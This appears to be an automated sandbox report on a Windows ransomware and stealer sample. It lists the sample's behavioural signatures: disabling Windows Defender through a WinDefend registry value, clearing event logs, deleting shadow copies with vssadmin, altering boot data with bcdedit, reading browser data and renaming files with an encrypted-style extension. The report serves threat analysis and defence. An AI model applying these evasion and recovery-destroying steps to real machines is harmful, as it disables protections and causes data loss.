Malware Analysis Report

2024-10-16 03:11

Sample ID 220113-l1xdaahca9
Target 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
SHA256 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d
Tags
evasion ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d

Threat Level: Known bad

The file 69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d was found to be: Known bad.

Malicious Activity Summary

evasion ransomware spyware stealer trojan

Deletes Windows Defender Definitions

Modifies Windows Defender Real-time Protection settings

Modifies security service

Clears Windows event logs

Deletes shadow copies

Modifies boot configuration data using bcdedit

Reads user/profile data of web browsers

Drops file in Program Files directory

Launches sc.exe

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Interacts with shadow copies

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-01-13 10:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-01-13 10:00

Reported

2022-01-13 10:06

Platform

win7-en-20211208

Max time kernel

75s

Max time network

3s

Command Line

"C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe"

Signatures

Deletes Windows Defender Definitions

evasion
Description Indicator Process Target
N/A N/A C:\Program Files\Windows Defender\MpCmdRun.exe N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Modifies security service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" C:\Windows\system32\reg.exe N/A

Clears Windows event logs

evasion ransomware

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0200377.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_settings.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-application-views.xml.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMC.exe.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\fr-FR\cpu.html C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_left_over.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBPAGE.DPV.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0291794.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_rainy.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00057_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\fr-FR\css\localizedSettings.css C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\search_background.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01006_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSTH7ES.LEX.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\es-ES\TipRes.dll.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\ENGIDX.DAT.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\BlackTieNewsletter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00272_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18238_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsIncomingImage.jpg.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD09194_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_03.MID.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\POSTCD98.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WEBHOME.POC.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0199661.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382948.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00559_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\THMBNAIL.PNG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBCOLOR.SCM.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Manaus.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Americana\TAB_ON.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD00155_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02073_.GIF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-gibbous_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Qatar.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107130.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03795_.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\HEADING.JPG.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\11.png C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_alignright.gif.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBOXES.XML.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_IAAAACAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyMergeLetter.dotx.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\js\localizedStrings.js C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0214948.WMF.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js.lfnjKakwy1TxglnsdXGCL4Q7YpsYh-rum7BFuM7Sxvz_AAAAAAAAAAA0.4ywda C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1792 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 520 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 520 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 520 wrote to memory of 540 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1792 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 1792 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\69bae77f5763878894f897e96208941385b1b31634439dd695b9b12e704f068d.exe C:\Windows\system32\net.exe
PID 760 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 760 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 760 wrote to memory of 1624 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
